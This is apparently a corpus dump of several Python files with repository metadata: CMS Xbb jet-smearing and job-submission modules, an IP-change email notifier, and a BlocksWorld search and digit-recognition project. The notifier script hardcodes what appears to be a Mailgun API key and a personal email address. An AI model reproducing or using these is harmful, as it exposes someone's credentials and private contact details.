formulaName) print("INFO: -> EvalInstance(0) on formulas will not re-load branches but will take values from memory, which might have been modified by this module.") treeFormula.SetQuickLoad(1)
Python
91
49.813187
577
/python/myutils/METXY.py
0.60441
0.597925
dabercro/Xbb
refs/heads/master
#!/usr/bin/env python from __future__ import print_function import ROOT from BranchTools import Collection from BranchTools import AddCollectionsModule import array import os import math import numpy as np # applies the smearing to MC jet resolution and modifies the Jet_PtReg* branches of the tree class JetSmearer(AddCollectionsModule): def __init__(self, year, unsmearPreviousCorrection=True, backupPreviousCorrection=True): super(JetSmearer, self).__init__() self.debug = 'XBBDEBUG' in os.environ self.unsmearPreviousCorrection = unsmearPreviousCorrection self.backupPreviousCorrection = backupPreviousCorrection self.quickloadWarningShown = False self.year = year if type(year) == str else str(year) self.smear_params = { #'2016': [1.0, 0.0, 0.0, 0.0], '2017': [1.0029846959, 0.0212893588055, 0.030684, 0.052497], '2018': [0.98667384694, 0.0197153848807, 0.038481, 0.053924], } if self.year not in self.smear_params: print("ERROR: smearing for year", self.year, " not available!") raise Exception("SmearingError") self.scale, self.scale_err, self.smear, self.smear_err = self.smear_params[self.year] def customInit(self, initVars): self.sampleTree = initVars['sampleTree'] self.isData = initVars['sample'].isData() self.sample = initVars['sample'] if self.sample.isMC(): # resolutions used in post-processor smearing self.unsmearResNom = 1.1 self.unsmearResUp = 1.2 self.unsmearResDown = 1.0 self.maxNjet = 256 self.PtReg = array.array('f', [0.0]*self.maxNjet) self.PtRegUp = array.array('f', [0.0]*self.maxNjet) self.PtRegDown = array.array('f', [0.0]*self.maxNjet) self.sampleTree.tree.SetBranchAddress("Jet_PtReg", self.PtReg) self.sampleTree.tree.SetBranchAddress("Jet_PtRegUp", self.PtRegUp) self.sampleTree.tree.SetBranchAddress("Jet_PtRegDown", self.PtRegDown) if self.backupPreviousCorrection: self.addVectorBranch("Jet_PtRegOld", default=0.0, branchType='f', length=self.maxNjet, leaflist="Jet_PtRegOld[nJet]/F") self.addVectorBranch("Jet_PtRegOldUp", default=0.0, branchType='f', 
length=self.maxNjet, leaflist="Jet_PtRegOldUp[nJet]/F") self.addVectorBranch("Jet_PtRegOldDown", default=0.0, branchType='f', length=self.maxNjet, leaflist="Jet_PtRegOldDown[nJet]/F") def processEvent(self, tree): if not self.hasBeenProcessed(tree) and self.sample.isMC(): self.markProcessed(tree) nJet = tree.nJet # backup the Jet_PtReg branches with the old smearing if self.backupPreviousCorrection: for i in range(nJet): self._b("Jet_PtRegOld")[i] = self.PtReg[i] self._b("Jet_PtRegOldUp")[i] = self.PtRegUp[i] self._b("Jet_PtRegOldDown")[i] = self.PtRegDown[i] # original post-procesor smearing which is undone: # if isMC: # # until we have final post-regression smearing factors we assume a flat 10% # if sysVar==0: # nominal # resSmear = 1.1 # elif sysVar==1: # up # resSmear = 1.2 # elif sysVar==-1: # down # resSmear = 1.0 # smearedPt = jet.pt*jet.bRegCorr # if jet.genJetIdx >=0 and jet.genJetIdx < len(self.genJetsWithNeutrinos) : # genJet=self.genJetsWithNeutrinos[jet.genJetIdx] # dPt = smearedPt - genJet.Pt() # smearedPt=genJet.Pt()+resSmear*dPt # return smearedPt # undo old smearing if self.unsmearPreviousCorrection: for i in range(nJet): genJetIdx = tree.Jet_genJetIdx[i] if genJetIdx > -1 and genJetIdx < len(tree.GenJetWithNeutrinos_pt): genJetPt = tree.GenJetWithNeutrinos_pt[genJetIdx] self.PtReg[i] = genJetPt + (self.PtReg[i] - genJetPt)/self.unsmearResNom self.PtRegUp[i] = genJetPt + (self.PtRegUp[i] - genJetPt)/self.unsmearResUp self.PtRegDown[i] = genJetPt + (self.PtRegDown[i] - genJetPt)/self.unsmearResDown # after undoing the smearing, check if up/down variations are the same assert (max(abs(self.PtReg[i]-self.PtRegUp[i]),abs(self.PtRegUp[i]-self.PtRegDown[i])) < 0.001 or self.PtReg[i] < 0) # apply new smearing for i in range(nJet): genJetIdx = tree.Jet_genJetIdx[i] if genJetIdx > -1 and genJetIdx < len(tree.GenJetWithNeutrinos_pt): gen_pt = tree.GenJetWithNeutrinos_pt[genJetIdx] # reference: 
https://github.com/dabercro/hbb/blob/b86589128a6839a12efaf041f579fe88c1d1be38/nanoslimmer/applysmearing/applysmearing.py regressed = self.PtReg[i] no_smear = regressed * self.scale gen_diff = regressed - gen_pt nominal = max(0.0, (gen_pt + gen_diff * (1.0 + self.smear)) * self.scale) band = math.sqrt(pow(nominal/self.scale * self.scale_err, 2) + pow(gen_diff * self.scale * self.smear_err, 2)) down, up = (max(nominal - band, no_smear), nominal + band) if regressed > gen_pt else (min(nominal + band, no_smear), nominal - band) self.PtReg[i] = nominal self.PtRegUp[i] = up self.PtRegDown[i] = down # formulas by default reload the branch content when evaluating the first instance of the object! # SetQuickLoad(1) turns off this behavior for formulaName, treeFormula in self.sampleTree.formulas.items(): if 'Jet_PtReg' in formulaName: if not self.quickloadWarningShown: self.quickloadWarningShown = True print("INFO: SetQuickLoad(1) called for formula:", formulaName) print("INFO: -> EvalInstance(0) on formulas will not re-load branches but will take values from memory, which might have been modified by this module.") treeFormula.SetQuickLoad(1) # print("\x1b[31mERROR: this module can't be used together with others which use formulas based on branches changed inside this module!\x1b[0m") # raise Exception("NotImplemented")
Python
130
51.453846
177
/python/myutils/JetSmearer.py
0.584225
0.557836
dabercro/Xbb
refs/heads/master
#! /usr/bin/env python import os import sys import glob from optparse import OptionParser from myutils.BetterConfigParser import BetterConfigParser from myutils.FileList import FileList from myutils.FileLocator import FileLocator from myutils.copytreePSI import filelist from myutils.sample_parser import ParseInfo def get_config(opts): # From submit.py pathconfig = BetterConfigParser() pathconfig.read('%sconfig/paths.ini' % opts.tag) try: _configs = [x for x in pathconfig.get('Configuration', 'List').split(" ") if len(x.strip()) > 0] if 'volatile.ini' in _configs: _configs.remove('volatile.ini') configs = ['%sconfig/' % (opts.tag) + c for c in _configs] except Exception as e: print("\x1b[31mERROR:" + str(e) + "\x1b[0m") print("\x1b[31mERROR: configuration file not found. Check config-tag specified with -T and presence of '[Configuration] List' in .ini files.\x1b[0m") raise Exception("ConfigNotFound") # read config config = BetterConfigParser() config.read(configs) return config def add_to_config(condor_config, template, sample, config, locator): if os.environ.get('XBBDEBUG'): print('Adding %s:' % sample) sampledir = os.path.join(config.get('Directories', 'CONDORout'), sample) if not os.path.exists(sampledir): os.makedirs(sampledir) for part, infile in enumerate(filelist(config.get('Directories', 'samplefiles'), sample)): job = { 'log': '%s_part%s' % (sample, part), 'part': part, 'sample': sample, 'filelist': FileList.compress(infile), 'outfile': locator.getFilenameAfterPrep(infile) } output_file = os.path.join(sampledir, job['outfile']) if os.path.exists(output_file) and os.stat(output_file).st_size: continue condor_config.write(template.format(**job)) if __name__ == '__main__': parser = OptionParser() parser.add_option('-T', '--tag', dest='tag', default='default', help='Tag to run the analysis with, example \'8TeV\' uses 8TeVconfig to run the analysis') parser.add_option('-S','--samples',dest='samples',default='*', help='samples you want to run on') 
parser.add_option('-o', '--output', dest='output', default='condor', help='output prefix') parser.add_option('-c', '--config', dest='config', default=None, help='Display a config value instead of making a submit file') (opts, args) = parser.parse_args(sys.argv) config = get_config(opts) if opts.config: print(config.get(*opts.config.split(':'))) exit(0) filelocator = FileLocator(config) parseinfo = ParseInfo(samples_path=config.get('Directories', 'PREPin'), config=config) with open('batch/condor/mit_header.sub', 'r') as header_file: header = header_file.read() logdir = os.path.join('/home/dabercro/public_html/xbb', config.get('Directories', 'Dname')) if not os.path.exists(logdir): os.makedirs(logdir) with open('batch/condor/mit_template.sub', 'r') as template_file: template = template_file.read().format( logdir=logdir, tag=opts.tag, outdir=config.get('Directories', 'CONDORin'), condorout=config.get('Directories', 'CONDORout'), log='{log}', part='{part}', sample='{sample}', filelist='{filelist}', outfile='{outfile}' ) with open('%s_%s.cfg' % (opts.output, opts.tag), 'w') as condor_config: condor_config.write(header) for sample_file in glob.iglob('%s/%s.txt' % (config.get('Directories', 'samplefiles'), opts.samples)): if sample_file.endswith('.root.txt'): continue sample = os.path.basename(sample_file).split('.')[0] samples = parseinfo.find(sample) if os.environ.get('XBBDEBUG'): print(samples) if len(samples) == 1: add_to_config(condor_config, template, sample, config, filelocator)
Python
124
32.080647
157
/python/submitMIT.py
0.618723
0.614822
dabercro/Xbb
refs/heads/master
#!/usr/bin/env python import ROOT import numpy as np import array import os from BranchTools import Collection from BranchTools import AddCollectionsModule from XbbTools import XbbTools class isBoosted(AddCollectionsModule): def __init__(self, branchName='isBoosted', cutName='all_BOOST'): super(isBoosted, self).__init__() self.branchName = branchName self.cutName = cutName self.version = 3 self.variations = self._variations("isBoosted") # returns cut string with variables replaced by their systematic variations def getSystVarCut(self, cut, syst, UD): replacementRulesList = XbbTools.getReplacementRulesList(self.config, syst) systVarCut = XbbTools.getSystematicsVariationTemplate(cut, replacementRulesList) systVarCut = systVarCut.replace('{syst}', syst).replace('{UD}', UD) return systVarCut def customInit(self, initVars): self.sample = initVars['sample'] self.sampleTree = initVars['sampleTree'] self.config = initVars['config'] self.boostedCut = self.config.get('Cuts', self.cutName) self.systVarCuts = {} self.systematics = sorted(list(set(sum([eval(self.config.get('LimitGeneral', x)) for x in ['sys_cr', 'sys_BDT', 'sys_Mjj']], [])))) # Nominal self.addIntegerBranch(self.branchName) self.sampleTree.addFormula(self.boostedCut) # systematic variations if self.sample.isMC(): for syst in self.systematics: for UD in self.variations: systVarBranchName = self._v(self.branchName, syst, UD) self.addIntegerBranch(systVarBranchName) self.systVarCuts[systVarBranchName] = self.getSystVarCut(self.boostedCut, syst=syst, UD=UD) self.sampleTree.addFormula(self.systVarCuts[systVarBranchName]) def processEvent(self, tree): # if current entry has not been processed yet if not self.hasBeenProcessed(tree): self.markProcessed(tree) # Nominal b = int(self.sampleTree.evaluate(self.boostedCut)) self._b(self._v(self.branchName))[0] = 1 if b > 0 else 0 # systematic variations if self.sample.isMC(): for syst in self.systematics: for UD in self.variations: systVarBranchName = 
self._v(self.branchName, syst, UD) b = int(self.sampleTree.evaluate(self.systVarCuts[systVarBranchName])) self._b(systVarBranchName)[0] = 1 if b > 0 else 0
Python
64
40.546875
139
/python/myutils/isBoosted.py
0.624343
0.620962
iJuanPablo/tools
refs/heads/master
""" ip_reader --------- Reads the Machine IP and emails if it has changed Mac - Linux crontab Windows: Command line as follows: schtasks /Create /SC HOURLY /TN PythonTask /TR "PATH_TO_PYTHON_EXE PATH_TO_PYTHON_SCRIPT" That will create an hourly task called 'PythonTask'. You can replace HOURLY with DAILY, WEEKLY etc. PATH_TO_PYTHON_EXE will be something like: C:\python25\python.exe. Otherwise you can open the Task Scheduler and do it through the GUI. Hope this helps. """ import collections import base64 import json from httplib import HTTPSConnection from urllib import urlencode from urllib2 import urlopen def encode_params(data): """Encode parameters in a piece of data. Will successfully encode parameters when passed as a dict or a list of 2-tuples. Order is retained if data is a list of 2-tuples but arbitrary if parameters are supplied as a dict. """ if isinstance(data, (str, bytes)): return data elif hasattr(data, 'read'): return data elif hasattr(data, '__iter__'): result = [] for k, vs in to_key_val_list(data): if isinstance(vs, basestring) or not hasattr(vs, '__iter__'): vs = [vs] for v in vs: if v is not None: result.append( (k.encode('utf-8') if isinstance(k, str) else k, v.encode('utf-8') if isinstance(v, str) else v)) return urlencode(result, doseq=True) else: return data def to_key_val_list(value): """Take an object and test to see if it can be represented as a dictionary. If it can be, return a list of tuples, e.g., :: >>> to_key_val_list([('key', 'val')]) [('key', 'val')] >>> to_key_val_list({'key': 'val'}) [('key', 'val')] >>> to_key_val_list('string') ValueError: cannot encode objects that are not 2-tuples. 
:rtype: list """ if value is None: return None if isinstance(value, (str, bytes, bool, int)): raise ValueError('cannot encode objects that are not 2-tuples') if isinstance(value, collections.Mapping): value = value.items() return list(value) file_path = 'ip.txt' my_ip = json.load(urlopen('https://api.ipify.org/?format=json'))['ip'] try: with open(file_path, 'r') as the_file: file_ip = the_file.read() except: file_ip = u'' if my_ip != file_ip: http = 'http://' url = 'api.mailgun.net' request = '/v3/sandboxee586e52376a457d8b274c437718a56e.mailgun.org/messages' key = 'key-29caea072852af2816e0b02f6733b751' base64string = base64.encodestring('api:'+key).replace('\n', '') headers = {'Authorization': 'Basic %s' % base64string, 'content-type': 'application/x-www-form-urlencoded'} payload = {"from": "PostMaster <postmaster@sandboxee586e52376a457d8b274c437718a56e.mailgun.org>", "to": "Juan Pablo <jp.urzua.t@gmail.com>", "subject": "La IP de la oficina ha cambiado!", "text": "La nueva IP es: " + my_ip} body = encode_params(payload) http_connection = HTTPSConnection(url) http_connection.request(method="POST", url=request, body=body, headers=headers) response = json.loads(http_connection.getresponse().read()) print response if response['message'] == 'Queued. Thank you.': with open(file_path, 'w') as the_file: the_file.write(my_ip) print "Escrito" else: print 'Same IP'
Python
123
26.975609
99
/ip_reader.py
0.604705
0.592797
DiegoArcelli/BlocksWorld
refs/heads/main
import numpy as np import matplotlib.pyplot as plt from keras.datasets import mnist from keras.layers import Conv2D from keras.layers import MaxPool2D from keras.layers import Flatten from keras.layers import Dense from keras.layers import Dropout from keras import Sequential # file per allenare e salvare la rete neurale che effettua il riconoscimento delle cifre # il modello viene allenato sul dataset del MNIST BATCH_SIZE = 64 EPOCHS = 10 # si estraggono e si (x_train, y_train), (x_test, y_test) = mnist.load_data() # si aggiunge la dimensione del canale e si normalizza il valore dei pixel tra 0 e 1 x_train = np.expand_dims(x_train, -1) x_train = x_train / 255 x_test = np.expand_dims(x_test, -1) x_test = x_test / 255 # definizione del modello model = Sequential() model.add(Conv2D(filters=24, kernel_size=(3, 3), activation="relu")) model.add(MaxPool2D(pool_size=(2, 2))) model.add(Dropout(0.5)) model.add(Conv2D(filters=36, kernel_size=(3, 3))) model.add(MaxPool2D(pool_size=(2, 2))) model.add(Dropout(0.5)) model.add(Flatten()) model.add(Dense(128, activation="relu")) model.add(Dense(10, activation="softmax")) model.predict(x_train[[0]]) model.summary() model.compile(optimizer="adam", loss='sparse_categorical_crossentropy', metrics=['accuracy']) # allenamento del modello history = model.fit(x_train, y_train, batch_size=BATCH_SIZE, epochs=EPOCHS, validation_data=(x_test, y_test)) # calcolo della precisione e dell'errore nel validation set test_loss, test_acc = model.evaluate(x_test, y_test) print('Test loss', test_loss) print('Test accuracy:', test_acc) # plot dei grafici relativi all'andamento di accuracy e loss plt.plot(history.history['accuracy']) plt.plot(history.history['val_accuracy']) plt.title('Model accuracy') plt.ylabel('Accuracy') plt.xlabel('Epoch') plt.legend(['Train', 'Val'], loc='upper left') plt.show() plt.plot(history.history['loss']) plt.plot(history.history['val_loss']) plt.title('Model loss') plt.ylabel('Loss') plt.xlabel('Epoch') 
plt.legend(['Train', 'Val'], loc='upper left') plt.show() model.save("./model/model.h5")
Python
72
28.333334
109
/cnn.py
0.725852
0.705492
DiegoArcelli/BlocksWorld
refs/heads/main
import tkinter as tk from tkinter.filedialog import askopenfilename from PIL import Image, ImageTk from load_state import prepare_image from utils import draw_state from blocks_world import BlocksWorld from search_algs import * # file che contiene l'implementazione dell'interfaccia grafica per utilizzare il programma class Window(tk.Frame): def __init__(self, master=None): super().__init__(master) self.master = master self.pack() self.initial_state = None self.goal_state = None self.create_widgets() self.create_images("insert_image.png", "insert_image.png") def create_widgets(self): initial_label = tk.Label(self, text = "Seleziona stato iniziale:") goal_label = tk.Label(self, text = "Seleziona stato finale:") initial_label.grid(row = 0, column = 0, padx = 10, pady = 10) goal_label.grid(row = 0, column = 2, padx = 10, pady = 10) initial_button = tk.Button(self, text="Seleziona file", command=self.open_initial) goal_button = tk.Button(self, text="Seleziona file", command=self.open_goal) initial_button.grid(row = 1, column = 0, padx = 10, pady = 10) goal_button.grid(row = 1, column = 2, padx = 10, pady = 10) alg_label = tk.Label(self, text = "Seleziona algoritmo di ricerca:") alg_label.grid(row = 0, column = 1, padx = 10, pady = 10) frame = tk.Frame(self) frame.grid(row = 1, column = 1, padx = 10, pady = 10) self.selected = tk.StringVar(self) self.selected.set("BFS") select_alg_menu = tk.OptionMenu(frame, self.selected, "BFS", "DFS", "IDS", "UCS", "A*", "RBFS", command=self.read_algorithm).pack() start_button = tk.Button(frame, text="Start search", command=self.start_search).pack() def create_images(self, initial, goal): self.initial_image_path = initial self.initial_image = ImageTk.PhotoImage(Image.open("./images/" + initial).resize((300, 300))) initial_image_label = tk.Label(self, image=self.initial_image) initial_image_label.grid(row = 2, column = 0, padx = 10, pady = 10) self.goal_image_path = goal self.goal_image = ImageTk.PhotoImage(Image.open("./images/" + 
goal).resize((300, 300))) goal_image_label = tk.Label(self, image=self.goal_image) goal_image_label.grid(row = 2, column = 2, padx = 10, pady = 10) def open_initial(self): self.initial_file = askopenfilename() if self.initial_file == (): return self.initial_state = prepare_image(self.initial_file, False) print(self.initial_state) draw_state(self.initial_state, "initial") self.create_images("/temp/initial.jpg", self.goal_image_path) def read_algorithm(self, alg): return alg def open_goal(self): self.goal_file = askopenfilename() if self.goal_file == (): return self.goal_state = prepare_image(self.goal_file, False) print(self.goal_state) draw_state(self.goal_state, "goal") self.create_images(self.initial_image_path, "/temp/goal.jpg") def start_search(self): if self.goal_state is None and self.initial_state is None: return alg = self.selected.get() problem = BlocksWorld(self.initial_state, self.goal_state) print("Inizio ricerca:") if alg == "BFS": problem.solution(graph_bfs(problem).solution()) if alg == "A*": problem.solution(a_star(problem, lambda n: problem.misplaced_blocks(n)).solution()) if alg == "DFS": problem.solution(graph_dfs(problem).solution()) if alg == "IDS": problem.solution(ids(problem).solution()) if alg == "RBFS": problem.solution(rbfs(problem, lambda n: problem.misplaced_blocks(n)).solution()) if alg == "UCS": problem.solution(a_star(problem, lambda n: problem.depth(n)).solution()) root = tk.Tk() root.title("Blocks World") root.resizable(0, 0) app = Window(master=root) app.mainloop()
Python
110
36.536366
139
/launch.py
0.619186
0.604167
DiegoArcelli/BlocksWorld
refs/heads/main
import heapq import functools import numpy as np import cv2 as cv import matplotlib.pyplot as plt class PriorityQueue: """A Queue in which the minimum (or maximum) element (as determined by f and order) is returned first. If order is 'min', the item with minimum f(x) is returned first; if order is 'max', then it is the item with maximum f(x). Also supports dict-like lookup.""" def __init__(self, order='min', f=lambda x: x): self.heap = [] if order == 'min': self.f = f elif order == 'max': # now item with max f(x) self.f = lambda x: -f(x) # will be popped first else: raise ValueError("Order must be either 'min' or 'max'.") def append(self, item): """Insert item at its correct position.""" heapq.heappush(self.heap, (self.f(item), item)) def extend(self, items): """Insert each item in items at its correct position.""" for item in items: self.append(item) def pop(self): """Pop and return the item (with min or max f(x) value) depending on the order.""" if self.heap: return heapq.heappop(self.heap)[1] else: raise Exception('Trying to pop from empty PriorityQueue.') def __len__(self): """Return current capacity of PriorityQueue.""" return len(self.heap) def __contains__(self, key): """Return True if the key is in PriorityQueue.""" return any([item == key for _, item in self.heap]) def __getitem__(self, key): """Returns the first value associated with key in PriorityQueue. Raises KeyError if key is not present.""" for value, item in self.heap: if item == key: return value raise KeyError(str(key) + " is not in the priority queue") def __delitem__(self, key): """Delete the first occurrence of key.""" try: del self.heap[[item == key for _, item in self.heap].index(True)] except ValueError: raise KeyError(str(key) + " is not in the priority queue") heapq.heapify(self.heap) def get_item(self, key): """Returns the first node associated with key in PriorityQueue. 
Raises KeyError if key is not present.""" for _, item in self.heap: if item == key: return item raise KeyError(str(key) + " is not in the priority queue") def is_in(elt, seq): """Similar to (elt in seq), but compares with 'is', not '=='.""" return any(x is elt for x in seq) def memoize(fn, slot=None, maxsize=32): """Memoize fn: make it remember the computed value for any argument list. If slot is specified, store result in that slot of first argument. If slot is false, use lru_cache for caching the values.""" if slot: def memoized_fn(obj, *args): if hasattr(obj, slot): return getattr(obj, slot) else: val = fn(obj, *args) setattr(obj, slot, val) return val else: @functools.lru_cache(maxsize=maxsize) def memoized_fn(*args): return fn(*args) return memoized_fn def draw_state(state, file_path): blocks = [*state[0:-1]] w = state[-1] blocks.sort(key=lambda l: l[1], reverse=True) h = blocks[0][1] image = np.zeros(((h+1)*100, w*100), np.uint8) for block in blocks: n, i, j = block i = h - i digit = cv.imread("./images/digits/" + str(n) + ".jpg", 0) digit = cv.resize(digit, (100, 100)) image[i*100:i*100 + 100, j*100:j*100 + 100] = ~digit size = (len(state) - 1)*100 padded = np.zeros((size, w*100), np.uint8) padded[size - (h+1)*100 : size, :] = image h = len(state) - 1 bg = np.zeros((h*100 + 40, w*100 + 40), np.uint8) bg[20: h*100 + 20, 20: w*100 + 20] = padded bg[0:10, :] = 255 bg[h*100 + 30 : h*100 + 40, :] = 255 bg[:, 0:10] = 255 bg[h*100 + 30 : h*100 + 40, :] = 255 bg[:,w*100 + 30 : w*100 + 40] = 255 w, h = (w*100 + 40, h*100 + 40) l = max(w, h) adjust = np.zeros((l, l), np.uint8) d_w = (l - w) // 2 d_h = (l - h) // 2 adjust[d_h: d_h + h, d_w: d_w + w] = bg cv.imwrite("./images/temp/" + str(file_path) + ".jpg", ~adjust)
Python
127
33.3937
80
/utils.py
0.555301
0.522098
DiegoArcelli/BlocksWorld
refs/heads/main
from aima3.search import * from utils import * from collections import deque from blocks_world import BlocksWorld import sys # file che contiene le implementazioni degli algoritmi di ricerca node_expanded = 0 # numero di nodi espansi durante la ricerca max_node = 0 # massimo numero di nodi presenti nella frontiera durante la ricerca f_dim = 0 # dimensione della frontiera in un dato momento total_node = 0 def init_param(): global node_expanded, total_node, max_node, f_dim node_expanded = 0 max_node = 0 total_node = 0 f_dim = 0 def print_param(): print(f"Nodi espansi: {node_expanded}") print(f"Max dimensione della frontiera: {max_node}") print(f"Dim media della frontiera: {int(total_node/node_expanded)}") # def get_item(queue, key): # """Returns the first node associated with key in PriorityQueue. # Raises KeyError if key is not present.""" # for _, item in queue.heap: # if item == key: # return item # raise KeyError(str(key) + " is not in the priority queue") def show_solution(name_algo, node): try: print(name_algo + ":", node.solution()) except: if type(Node) == str: print(name_algo + ":", node) else: print(name_algo + ":", "No solution found") # Graph Breadth First Search def graph_bfs(problem): global node_expanded, total_node, max_node, f_dim init_param() frontier = deque([Node(problem.initial)]) f_dim += 1 explored = set() while frontier: node_expanded += 1 total_node += f_dim node = frontier.popleft() f_dim -= 1 explored.add(node.state) if problem.goal_test(node.state): # print(node_expanded) print_param() return node for child_node in node.expand(problem): if child_node.state not in explored and child_node not in frontier: f_dim += 1 max_node = f_dim if f_dim > max_node else max_node frontier.append(child_node) # Graph Depth First Search def graph_dfs(problem): global node_expanded, total_node, max_node, f_dim init_param() frontier = deque([Node(problem.initial)]) f_dim += 1 explored = set() while frontier: total_node += f_dim node = frontier.pop() 
node_expanded += 1 f_dim -= 1 if problem.goal_test(node.state): print_param() return node explored.add(node.state) for child_node in node.expand(problem): if child_node.state not in explored and child_node not in frontier: f_dim += 1 max_node = f_dim if f_dim > max_node else max_node frontier.append(child_node) # Uniform Cost Search def ucs(problem, f): global node_expanded, total_node, max_node, f_dim init_param() if problem.goal_test(problem.initial): return Node(problem.initial) f = memoize(f, 'f') node_expanded += 1 frontier = PriorityQueue('min', f) frontier.append(Node(problem.initial)) f_dim += 1 explored = set() while frontier: total_node += f_dim node_expanded += 1 node = frontier.pop() f_dim -= 1 # print(node, f(node)) if problem.goal_test(node.state): print_param() return node explored.add(node.state) for child in node.expand(problem): if child.state not in explored and child not in frontier: f_dim += 1 frontier.append(child) max_node = f_dim if f_dim > max_node else max_node elif child in frontier: next_node = frontier.get_item(child) if f(child) < f(next_node): del frontier[next_node] frontier.append(child) # Depth Limited Search def dls(problem, limit): def recursive_dls(problem, node, limit): global node_expanded, total_node, max_node, f_dim node_expanded += 1 total_node += f_dim if problem.goal_test(node.state): return node elif limit == 0: return 'cutoff' cutoff_occurred = False for child_node in node.expand(problem): f_dim+=1 max_node = f_dim if f_dim > max_node else max_node result = recursive_dls(problem, child_node, limit-1) f_dim -= 1 if result == 'cutoff': cutoff_occurred = True elif result is not None: return result return 'cutoff' if cutoff_occurred else None return recursive_dls(problem, Node(problem.initial), limit) # Iterative Deepening Search def ids(problem): global node_expanded, total_node, max_node, f_dim init_param() prevexp = 0 for depth in range(sys.maxsize): f_dim += 1 result = dls(problem, depth) print(node_expanded - prevexp) 
prevexp = node_expanded f_dim = 0 if result != 'cutoff': print_param() return result return None # A* def a_star(problem: BlocksWorld, h=None): global node_expanded h = memoize(h or problem.h) return ucs(problem, lambda n: problem.depth(n) + h(n)) # Recursive Best First Search def rbfs(problem, h): global node_expanded, total_node, max_node, f_dim init_param() h = memoize(h or problem.h, 'h') g = memoize(lambda n: problem.depth(n), 'g') f = memoize(lambda n: g(n) + h(n), 'f') def rbfs_search(problem, node, f_limit=np.inf): global node_expanded, total_node, max_node, f_dim node_expanded += 1 if problem.goal_test(node.state): print_param() return node, 0 successors = [*node.expand(problem)] f_dim += len(successors) total_node += f_dim max_node = f_dim if f_dim > max_node else max_node if len(successors) == 0: return None, np.inf for child in successors: child.f = max(f(child), node.f) while True: successors.sort(key=lambda x: x.f) best = successors[0] if best.f > f_limit: f_dim -= len(successors) return None, best.f alt = successors[1].f if len(successors) > 1 else np.inf # importante, sovrascrivere best.f result, best.f = rbfs_search(problem, best, min(f_limit, alt)) # return result if result is not None: f_dim -= len(successors) return result, best.f node = Node(problem.initial) f(node) f_dim += 1 return rbfs_search(problem, node)[0]
Python
228
28.666666
81
/search_algs.py
0.57371
0.568091
DiegoArcelli/BlocksWorld
refs/heads/main
from aima3.search import * from utils import * import numpy as np import cv2 as cv import matplotlib.pyplot as plt # file che contine l'implementazione del problema basata con AIMA class BlocksWorld(Problem): def __init__(self, initial, goal): super().__init__(initial, goal) # restituisce il numero di blocchi def get_blocks_number(self): return len(self.initial) # restituisce la lista delle possibili azioni nello stato corrente def actions(self, state): blocks = [*state[0:-1]] size = state[-1] columns = {} tops = [] for block in blocks: n, i, j = block if j not in columns: columns[j] = (n, i, j) else: if i > columns[j][1]: columns[j] = (n, i, j) for col in columns: tops.append(columns[col]) actions = [] for block in tops: n, i, j = block for col in range(size): if col != j: if col in columns: actions.append((n, columns[col][1]+1, col)) else: actions.append((n, 0, col)) return actions # def result(self, state, actions): blocks = [*state[0:-1]] size = state[-1] to_delete = () for block in blocks: if block[0] == actions[0]: to_delete = block blocks.remove(to_delete) blocks.append((actions)) blocks.append(size) return tuple(blocks) # verifica se lo stato passato è lo stato finale def goal_test(self, state): op_1 = [*state[0:-1]] op_2 = [*self.goal[0:-1]] op_1.sort(key=lambda l: l[0]) op_2.sort(key=lambda l: l[0]) return str(op_1) == str(op_2) # restituisce i blocchi che possono essere spostati nello stato che viene passato def get_movable(self, state): blocks = [*state[0:-1]] size = state[-1] columns = {} tops = [] for block in blocks: n, i, j = block if j not in columns: columns[j] = (n, i, j) else: if i > columns[j][1]: columns[j] = (n, i, j) for col in columns: tops.append(columns[col]) return tops # euristica che calcola il numero di blocchi in posizione errata def misplaced_blocks(self, node): blocks = [*node.state[0:-1]] target = [*self.goal[0:-1]] target.sort(key=lambda l: l[0]) value = 0 for block in blocks: n, i, j = block if target[n-1][1:3] != (i, j): value 
+= 1 # if block not in self.get_movable(node.state): # value += 1 return value # ritorna la profondità di un nodo nell'albero di ricerca def depth(self, node): return node.depth # stampa la lista delle azioni che portano dallo stato iniziale allo stato finale def solution(self, actions, output=True): if len(actions) is None: return state = self.initial successor = None n = 1 print("Lunghezza soluzione: " + str(len(actions))) for action in actions: print(action) successor = self.result(state, action) if output: figue_1 = self.draw_state(state) figue_2 = self.draw_state(successor) _, axarr = plt.subplots(1, 2) axarr[0].imshow(figue_1, cmap=plt.cm.binary) axarr[0].set_xticks([]) axarr[0].set_yticks([]) axarr[0].set_xlabel(f"\nStato {n}") axarr[1].imshow(figue_2, cmap=plt.cm.binary) axarr[1].set_xticks([]) axarr[1].set_yticks([]) axarr[1].set_xlabel(f"\nStato {n+1}") figManager = plt.get_current_fig_manager() figManager.full_screen_toggle() plt.show() state = successor n += 1 # metodo che fornisce una rappresentazione grafica dello stato che gli viene passato def draw_state(self, state): blocks = [*state[0:-1]] w = state[-1] blocks.sort(key=lambda l: l[1], reverse=True) h = blocks[0][1] image = np.zeros(((h+1)*100, w*100), np.uint8) for block in blocks: n, i, j = block i = h - i digit = cv.imread("./images/digits/" + str(n) + ".jpg", 0) digit = cv.resize(digit, (100, 100)) image[i*100:i*100 + 100, j*100:j*100 + 100] = ~digit size = (len(state) - 1)*100 adjust = np.zeros((size, w*100), np.uint8) adjust[size - (h+1)*100 : size, :] = image return adjust
Python
154
30.805195
88
/blocks_world.py
0.502348
0.48009
DiegoArcelli/BlocksWorld
refs/heads/main
from PIL import Image, ImageTk from load_state import prepare_image from utils import draw_state from blocks_world import BlocksWorld from search_algs import * import argparse from inspect import getfullargspec # file che definisce lo script da linea di comando per utilizzare il programma if __name__ == "__main__": search_algs = { "astar": a_star, "ucs": ucs, "rbfs": rbfs, "bfs": graph_bfs, "dfs": graph_dfs, "ids": ids } parser = argparse.ArgumentParser(description="Blocks World") parser.add_argument("--initial", "-i", type=str, default=None, required=True, help="The image representing the initial state") parser.add_argument("--goal", "-g", type=str, default=None, required=True, help="The image representing the goal state") parser.add_argument("--algorithm", "-a", type=str, default=None, required=True, help="The search algorithm used") parser.add_argument("--debug", "-d", default=False, required=False, action='store_true', help="Shows the steps of the image processing") parser.add_argument("--output", "-o", default=False, required=False, action='store_true', help="The solution is printed graphically") args = vars(parser.parse_args()) initial_state_path = args["initial"] goal_state_path = args["goal"] search_alg = args["algorithm"] debug = args["debug"] output = args["output"] initial_state = prepare_image(initial_state_path, debug) goal_state = prepare_image(goal_state_path, debug) print(initial_state) print(goal_state) functions = { "ucs": lambda n: problem.depth(n), "astar": lambda n: problem.misplaced_blocks(n), "rbfs": lambda n: problem.misplaced_blocks(n) } problem = BlocksWorld(initial_state, goal_state) if 